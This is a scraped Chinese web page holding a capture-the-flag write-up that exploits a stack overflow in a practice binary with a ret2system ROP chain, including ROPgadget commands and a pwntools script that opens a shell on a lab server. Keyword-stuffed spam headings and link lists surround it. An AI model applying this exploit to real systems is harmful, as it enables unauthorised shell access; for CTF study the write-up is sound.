当前位置: 首页 > wzjs >正文

青岛网站设计建议i青岛博采网络百度竞价优化排名

青岛网站设计建议i青岛博采网络,百度竞价优化排名,做政府网站话术,wordpress ecs云服务器1. 背景分析 目标程序是一个存在漏洞的二进制文件,我们可以通过以下方式利用漏洞获取 shell: 程序中存在 system() 函数,但没有明显的 /bin/sh 字符串。 使用工具(如 ROPgadget)发现程序中有 sh 字符串,可…
1. 背景分析

目标程序是一个存在漏洞的二进制文件,我们可以通过以下方式利用漏洞获取 shell:

  1. 程序中存在 system() 函数,但没有明显的 /bin/sh 字符串。

  2. 使用工具(如 ROPgadget)发现程序中有 sh 字符串,可以利用它作为 system() 的参数。

  3. 程序的交互逻辑需要先输入密码,然后选择操作,最后通过溢出漏洞触发 ROP 链。

2. 具体步骤
步骤 1:确定偏移量

通过分析程序的漏洞点(例如通过格式化字符串漏洞或堆溢出漏洞),找到可以覆盖返回地址的偏移量。假设偏移量为 0x48 + 4

步骤 2:查找关键地址

使用工具(如 ROPgadgetIDA Pro)查找以下地址:

  • system() 函数的地址。

  • main() 函数的地址(用于防止程序崩溃)。

  • sh 字符串的地址。

示例命令:

bash复制

ROPgadget --binary ./zzz --search "system"
ROPgadget --binary ./zzz --search "sh"

假设:

  • system() 的地址为 0x08048430

  • main() 的地址为 0x08048500

  • sh 的地址为 0x08048123

步骤 3:交互流程

程序的交互逻辑如下:

  1. 程序提示输入管理员密码。

  2. 程序提供选项,需要选择 1 添加 log。

  3. 程序提示输入新的 log,此时发送构造的 ROP 链。

  4. 再次选择操作,选择 4 触发漏洞。

步骤 4:构造 ROP 链

根据上述地址和偏移量,构造 ROP 链:

  1. 填充到返回地址的偏移量。

  2. 覆盖返回地址为 system() 的地址。

  3. system() 返回后跳转到 main(),防止程序崩溃。

  4. sh 的地址作为 system() 的参数。

步骤 5:发送 ROP 链并触发漏洞

通过网络交互,发送构造的 ROP 链,并触发漏洞。

第一个条件s1 == 'administrator'

 ADDLog():我们看到这里是输入log,跟我们的flag有关系

                          a1是我们外面传进来的src = 48,读取128个就造成了溢出

 

from pwn import *context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./zzz')def main():if content == 1:p = process('zzz')else:p =remote('node5.buuoj.cn',25739)#0x080482ea : shsh_addr     = 0x080482easystem_addr = elf.sym['system']payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)p.sendlineafter("Please input admin password:",'administrator')p.sendlineafter("0.Exit\n:",'1')p.sendlineafter("Please input new log info:",payload)p.sendlineafter("0.Exit\n:",'4')p.interactive()
main()

http://www.dtcms.com/wzjs/478443.html

相关文章:

  • 营销型网站优点app开发公司
  • 广东省一流高职院校建设专题网站互联网营销的方式有哪些
  • 做网站现在用什么语言企业网络推广软件
  • 电脑网站转换成手机网站搜索引擎排名查询工具
  • 网页代码怎么调出来seo优化工具有哪些
  • 网站搭建文案中文域名查询官网
  • 商标注册查询官网入口官方甘肃省seo关键词优化
  • 南京网站开发建设某网站seo诊断分析和优化方案
  • 下列哪个不是网络营销成熟阶段出现的网络营销方式关键词优化和seo
  • 一般网站的架构bing搜索引擎下载
  • outlook企业邮箱官网seo优化软件哪个好
  • 微网站建设收费网店推广营销方案
  • 公司网站文章的排版最新疫情爆发
  • 网站的建设日程安排怎么在百度做广告
  • 南昌网站推广排名优质网站
  • 网站系统优点全国疫情高峰感染高峰进度查询
  • 网站制作简单模版百度百科词条
  • 梨树做网站百度搜不干净的东西
  • 做网站跟桌面程序差别大吗整站优化全网营销
  • 有域名了如何自己做网站购买域名
  • 上海做网站公司做网站的公司有哪些seo排名赚钱
  • java网站开发具体业务情形游戏推广渠道
  • 网站建设中 英文英文网站设计公司
  • 秦皇岛属于河北哪个市四川seo排名
  • 信阳网站设计发文章用哪个平台比较好
  • 有没有教做衣服的网站企业培训课程开发
  • 珠海响应式网站建设推广公司百度推广登录官网入口
  • 事业单位网站建设方案快速建站教程
  • wordpress中文 插件百度优化软件
  • 中国建设招投标网站网站设计公司多少钱